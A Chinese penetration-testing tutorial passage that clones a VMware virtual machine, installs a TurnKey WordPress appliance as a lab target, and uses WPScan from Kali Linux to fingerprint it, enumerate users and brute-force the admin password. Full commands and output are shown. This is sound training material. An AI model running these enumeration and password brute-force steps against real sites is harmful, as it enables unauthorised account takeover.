带你进入高级测试实验室,
使用VMware Workstation
當(dāng)用戶在主機(jī)上執(zhí)行任務(wù)時(shí),可能會(huì)導(dǎo)致其他系統(tǒng)不穩(wěn)定甚至無法運(yùn)行。為了方便用戶操作,VMware Workstation提供了一個(gè)非常好的工具,實(shí)現(xiàn)虛擬環(huán)境的復(fù)制。這樣,就避免了用戶反復(fù)創(chuàng)建虛擬機(jī)系統(tǒng)??寺√摂M環(huán)境時(shí),必須將該系統(tǒng)關(guān)閉。否則,不能克隆。復(fù)制虛擬環(huán)境的具體操作步驟如下所示。
(1)在VMware Workstation主界面先選擇要復(fù)制的虛擬機(jī)。然后在該界面依次選擇“虛擬機(jī)”|“管理(M)”|“克隆(C)”命令,將顯示如圖3.1所示的界面。
圖3.1 歡迎使用克隆虛擬機(jī)向?qū)?/p>
(2)在該界面單擊“下一步”按鈕,將顯示如圖3.2所示的界面。
圖3.2 克隆源
(3)在該界面可以選擇從哪個(gè)狀態(tài)創(chuàng)建克隆,這里選擇“虛擬機(jī)中的當(dāng)前狀態(tài)”選項(xiàng)。然后單擊“下一步”按鈕,將顯示如圖3.3所示的界面。
圖3.3 克隆方法
(4)在該界面選擇克隆方法。默認(rèn)提供了“創(chuàng)建鏈接克隆”和“創(chuàng)建完整克隆”兩種方法。本例中選擇“創(chuàng)建完整克隆”選項(xiàng),然后單擊“下一步”按鈕,將顯示如圖3.4所示的界面。
-
鏈接克隆:它是從父本的一個(gè)快照克隆出來的。鏈接克隆需要使用到父本的磁盤文件,如果父本不可使用(比如被刪除),那么鏈接克隆也不能使用了。
-
完整克隆:它是一個(gè)獨(dú)立的虛擬機(jī),克隆結(jié)束后它不需要共享父本。該過程是完全克隆一個(gè)父本,并且和父本完全分離。完整克隆只是從父本的當(dāng)前狀態(tài)開始克隆,克隆結(jié)束后和父本就沒有任何關(guān)聯(lián)了。
圖3.4 新虛擬機(jī)名稱
(5)該界面用來設(shè)置虛擬機(jī)的名稱和位置。然后單擊“完成”按鈕,將顯示如圖3.5所示的界面。
圖3.5 正在克隆虛擬機(jī)
(6)該界面是克隆虛擬機(jī)的一個(gè)過程??寺⊥瓿珊?#xff0c;將顯示如圖3.6所示的界面。
圖3.6 克隆完成
(7)從該界面可以看到虛擬機(jī)已克隆完成,此時(shí)單擊“關(guān)閉”按鈕,克隆的虛擬機(jī)會(huì)自動(dòng)添加到VMware Workstation主窗口界面,如圖3.7所示。
圖3.7 克隆的虛擬機(jī)
(8)現(xiàn)在就可以單擊“開啟此虛擬機(jī)”按鈕,運(yùn)行克隆的操作系統(tǒng)了。
攻擊WordPress和其他應(yīng)用程序
獲取WordPress應(yīng)用程序
獲取WordPress應(yīng)用程序的具體操作步驟如下所示。
(1)在瀏覽器中輸入http://www.turnkeylinux.org地址,打開的界面如圖3.8所示。從該界面下載Turnkey Linux。
圖3.8 Turnkey主頁
(2)在該頁面列出了許多程序,可以通過向下滾動(dòng)鼠標(biāo)查看。由于篇幅的原因,圖3.8只截取了一少部分內(nèi)容。在該頁面中,用戶可以嘗試使用各種軟件查找漏洞,并通過工具對(duì)這些應(yīng)用程序來測(cè)試用戶的技術(shù)。本例中將選擇測(cè)試WordPress,向下滾動(dòng)鼠標(biāo)可以看到Instant Search對(duì)話框,如圖3.9所示。
圖3.9 立即搜索
(3)在該對(duì)話框中輸入WordPress,然后按下回車鍵,將顯示如圖3.10所示的界面。
圖3.10 WordPress應(yīng)用程序
(4)在該界面可以看到WordPress程序已經(jīng)找到,此時(shí)單擊WordPress-Blog Publishing Platform鏈接進(jìn)入下載頁面,如圖3.11所示。
圖3.11 Turnkey下載頁面
(5)在該界面選擇下載ISO映像文件。單擊220MB ISO鏈接,將顯示如圖3.12所示的界面。
圖3.12 設(shè)置郵箱地址
(6)該界面提示為了安全,需要填寫一個(gè)郵箱地址。填寫完后,單擊Subscribe and go straight to download按鈕,將開始下載Turnkey WordPress軟件。
安裝WordPress Turnkey Linux
本小節(jié)將介紹在VMware Workstation中安裝WordPress Turnkey Linux。關(guān)于VMware Workstation的使用,在第1章中已經(jīng)詳細(xì)介紹過,這里就不再贅述。安裝WordPress Turnkey Linux的具體操作步驟如下所示。
(1)將前面下載的ISO文件導(dǎo)入到光驅(qū)中,然后啟動(dòng)此虛擬機(jī),將顯示如圖3.13所示的界面。
圖3.13 TURNKEY初始界面
(2)在該界面選擇Install to hard disk選項(xiàng),按下“回車鍵”,將顯示如圖3.14所示的界面。
圖3.14 選擇分區(qū)方法
(3)該界面是選擇分區(qū)的方法。該系統(tǒng)提供了三種方法,分別是使用整個(gè)磁盤并設(shè)置LVM、使用整個(gè)磁盤和手動(dòng)分區(qū)。這里選擇第一種,然后單擊OK按鈕,將顯示如圖3.15所示的界面。
圖3.15 將數(shù)據(jù)寫入磁盤
(4)該界面顯示了分區(qū)的信息,這里提示是否將寫入改變磁盤并配置LVM呢?如果想要重新分配分區(qū)的話,就單擊No按鈕,否則單擊Yes按鈕。本例中單擊Yes按鈕,將顯示如圖3.16所示的界面。
圖3.16 LVM信息
(5)該界面顯示了LVM的配置信息。單擊OK按鈕,將顯示如圖3.17所示的界面。
圖3.17 使用引導(dǎo)分區(qū)的卷組
(6)該界面提示使用引導(dǎo)分區(qū)的卷組來安裝系統(tǒng)。此時(shí),單擊OK按鈕,將顯示如圖3.18所示的界面。
圖3.18 磁盤分區(qū)表
(7)該界面顯示了磁盤的分區(qū)表信息,此時(shí)提示是否要寫入數(shù)據(jù)。這里單擊Yes按鈕,將顯示如圖3.19所示的界面。
圖3.19 復(fù)制數(shù)據(jù)到磁盤
(8)該界面顯示了復(fù)制數(shù)據(jù)的磁盤的一個(gè)進(jìn)度。復(fù)制完后,將顯示如圖3.20所示的 界面。
圖3.20 安裝GRUB引導(dǎo)
(9)該界面提示是否安裝GRUB引導(dǎo)加載程序的主引導(dǎo)記錄。這里單擊Yes按鈕,將顯示如圖3.21所示的界面。
圖3.21 是否重啟系統(tǒng)
(10)該界面顯示W(wǎng)ordPress Turnkey Linux已經(jīng)安裝完成,是否現(xiàn)在重新啟動(dòng)系統(tǒng)。單擊Yes按鈕,將顯示如圖3.22所示的界面。
圖3.22 Root密碼
(11)在該界面為Root用戶設(shè)置一個(gè)密碼。輸入密碼后,單擊OK按鈕,將顯示如圖3.23所示的界面。
圖3.23 Root確認(rèn)密碼
(12)該界面要求再次為Root用戶輸入相同的密碼,單擊OK按鈕,將顯示如圖3.24所示的界面。
圖3.24 MySQL密碼
(13)在該界面為MySQL服務(wù)的Root用戶設(shè)置一個(gè)密碼,設(shè)置完后單擊OK按鈕,將顯示如圖3.25所示的界面。
圖3.25 MySQL確認(rèn)密碼
(14)在該界面再次為MySQL服務(wù)的Root用戶輸入相同的密碼,然后單擊OK按鈕,將顯示如圖3.26所示的界面。
圖3.26 Wordpress用戶admin密碼
(15)在該界面要求為Wordpress的用戶admin設(shè)置一個(gè)密碼,輸入密碼后,單擊OK按鈕,將顯示如圖3.27所示的界面。
圖3.27 Wordpress用戶admin確認(rèn)密碼
(16)在該界面再次為Wordpress用戶admin輸入相同的密碼,然后單擊OK按鈕,將顯示如圖3.28所示的界面。
圖3.28 設(shè)置郵件地址
(17)該界面提示為Wordpress用戶admin設(shè)置一個(gè)郵件地址,這里使用默認(rèn)的admin@example.com。然后單擊Apply按鈕,將顯示如圖3.29所示的界面。
圖3.29 Initialize Hub Services
(18)該界面顯示了初始化Hub服務(wù)信息,在該界面單擊Skip按鈕,將顯示如圖3.30所示的界面。
圖3.30 Security updates
(19)該界面提示是否現(xiàn)在安裝安全更新,這里單擊Install按鈕,將顯示如圖3.31所示的界面。
圖3.31 WORDPRESS appliance services
(20)該界面顯示了WordPress應(yīng)用服務(wù)的詳細(xì)信息,如Web地址、Web shell地址和端口、Webmin地址、PHPMyAdmin地址和端口及SSH/SFTP地址和端口等。此時(shí),表明WordPress Turnkey Linux就可以使用了。
攻擊WordPress應(yīng)用程序
上一小節(jié)介紹了WordPress虛擬機(jī)的安裝?,F(xiàn)在就可以啟動(dòng)WordPress虛擬機(jī),在Kali Linux下使用WPScan攻擊它。WPScan是一個(gè)黑盒安全掃描器,它允許用戶查找Word Press安裝版的一些已知的安全漏洞。本小節(jié)將介紹使用WPScan工具攻擊WordPress應(yīng)用程序。
WPScan在Kali Linux中已經(jīng)默認(rèn)安裝。它的語法格式如下所示:
wpscan [選項(xiàng)] [測(cè)試]
常用的選項(xiàng)如下所示。
-
–update:更新到最新版本。
-
–url|-u :指定掃描WordPress的URL(統(tǒng)一資源定位符)或域名。
-
–force |-f:如果遠(yuǎn)程站點(diǎn)正運(yùn)行WordPress,強(qiáng)制WPScan不檢查。
-
–enumerate |-e [option(s)]:計(jì)算。該參數(shù)可用的選項(xiàng)有u、u[10-20]、p、vp、ap、tt、t、vt和at。其中u表示用戶名從id1到10;u[10-20]表示用戶名從id10到20([]中的字符必須寫);p表示插件程序;vp表示僅漏洞插件程序;ap表示所有插件程序(可能需要一段時(shí)間);tt表示timthumbs;t表示主題;vt表示僅漏洞主題;at表示所有主題(可能需要一段時(shí)間)。
【實(shí)例3-1】使用WPScan攻擊WordPress程序的具體操作步驟如下所示。
(1)在Kali Linux下,查看WPScan的幫助信息。執(zhí)行命令如下所示:
root@localhost:~# wpscan -h
__ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version v2.2 Sponsored by the RandomStorm Open Source Initiative @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
Help :
Some values are settable in conf/browser.conf.json : user-agent,
proxy, proxy-auth, threads, cache timeout and request timeout …
m conf/browser.conf.json).
–basic-auth username:password Set the HTTP Basic authentication
–wordlist | -w Supply a wordlist for the password bruter and do the brute.
–threads | -t The number of threads to use when multi-threading requests. (will override the value from conf/browser.
conf.json)
–username | -U Only brute force the supplied username.
–help | -h This help screen.
–verbose | -v Verbose output.
Examples :
-Further help … ruby ./wpscan.rb --help
-Do ‘non-intrusive’ checks … ruby ./wpscan.rb --url www.example.com
-Do wordlist password brute force on enumerated users using 50 threads … ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst
–threads 50
-Do wordlist password brute force on the ‘a(chǎn)dmin’ username only … ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst
–username admin …
執(zhí)行以上命令后,會(huì)輸出大量信息。輸出的信息中顯示了WPScan的版本信息、使用方法及WPScan的例子等。由于篇幅的原因,這里貼了一部分內(nèi)容,其他使用省略號(hào)(……)取代。
(2)使用WPScan攻擊WordPress虛擬機(jī)。本例中,WordPress的IP地址是192.168.41.130。執(zhí)行命令如下所示:
root@localhost:~# wpscan -u 192.168.41.130
__ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ /| ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version v2.2 Sponsored by the RandomStorm Open Source Initiative @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
| URL: http://192.168.41.130/ | Started: Thu Apr 17 13:49:37 2014
[!] The WordPress ‘http://192.168.41.130/readme.html’ file exists [+]
Interesting header: SERVER: Apache/2.2.22 (Debian) [+] Interesting
header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 [+] XML-RPC Interface
available under: http://192.168.41.130/xmlrpc.php [+] WordPress
version 3.6.1 identified from meta generator
[+] WordPress theme in use: twentythirteen v1.0
| Name: twentythirteen v1.0 | Location:
http://192.168.41.130/wp-content/themes/twentythirteen/
[+] Enumerating plugins from passive detection … No plugins found
[+] Finished: Thu Apr 17 13:49:41 2014 [+] Memory used: 2.414 MB [+]
Elapsed time: 00:00:03
輸出的信息顯示了WPScan一個(gè)簡(jiǎn)單的攻擊過程。
(3)列出用戶名列表,執(zhí)行命令如下所示:
root@localhost:~# wpscan -u 192.168.41.130 -e u vp
__ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version v2.2 Sponsored by the RandomStorm Open Source Initiative @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
| URL: http://192.168.41.130/ | Started: Thu Apr 17 13:50:49 2014
[!] The WordPress ‘http://192.168.41.130/readme.html’ file exists [+]
Interesting header: SERVER: Apache/2.2.22 (Debian) [+] Interesting
header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 [+] XML-RPC Interface
available under: http://192.168.41.130/xmlrpc.php [+] WordPress
version 3.6.1 identified from meta generator
[+] WordPress theme in use: twentythirteen v1.0
| Name: twentythirteen v1.0 | Location:
http://192.168.41.130/wp-content/themes/twentythirteen/
[+] Enumerating plugins from passive detection … No plugins found
[+] Enumerating usernames … [+] We found the following 1 user/s:
±—±------±------+
| Id | Login | Name |
±—±------±------+
| 1 | admin | admin |
±—±------±------+
[+] Finished: Thu Apr 17 13:50:54 2014 [+] Memory used: 2.379 MB [+]
Elapsed time: 00:00:04
從輸出的信息中可以看到當(dāng)前系統(tǒng)中只有一個(gè)用戶,名為admin。
(4)為WPScan指定一個(gè)wordlist文件,使用–wordlist 選項(xiàng)。執(zhí)行命令如下所示:
root@localhost:~# wpscan -u 192.168.41.130 -e u --wordlist /root/
wordlist.txt
__ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version v2.2 Sponsored by the RandomStorm Open Source Initiative @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
| URL: http://192.168.41.130/ | Started: Thu Apr 17 13:54:51 2014
[!] The WordPress ‘http://192.168.41.130/readme.html’ file exists [+]
Interesting header: SERVER: Apache/2.2.22 (Debian) [+] Interesting
header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 [+] XML-RPC Interface
available under: http://192.168.41.130/xmlrpc.php [+] WordPress
version 3.6.1 identified from meta generator
[+] WordPress theme in use: twentythirteen v1.0
| Name: twentythirteen v1.0 | Location:
http://192.168.41.130/wp-content/themes/twentythirteen/
[+] Enumerating plugins from passive detection … No plugins found
[+] Enumerating usernames … [+] We found the following 1 user/s:
±—±------±------+
| Id | Login | Name |
±—±------±------+
| 1 | admin | admin |
±—±------±------+
[+] Starting the password brute forcer Brute Forcing ‘a(chǎn)dmin’ Time:
00:00:00 < > (59 / 20575) 0.28% ETA: 00:00:00
[SUCCESS] Login : admin Password : 123456
±—±------±------±---------+ | Id | Login | Name | Password
| ±—±------±------±---------+ | 1 | admin | admin |
123456 | ±—±------±------±---------+
[+] Finished: Thu Apr 17 13:54:56 2014 [+] Memory used: 2.508 MB [+]
Elapsed time: 00:00:05
從輸出的信息中,可以看到WordPress用戶admin的密碼已被破解出。
《新程序員》:云原生和全面數(shù)字化實(shí)踐50位技術(shù)專家共同創(chuàng)作,文字、視頻、音頻交互閱讀總結(jié)
以上是生活随笔為你收集整理的带你进入高级测试实验室,的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 手把手教你配置Kali Linux
- 下一篇: 带你了解无线网络渗透测试——无线网络嗅探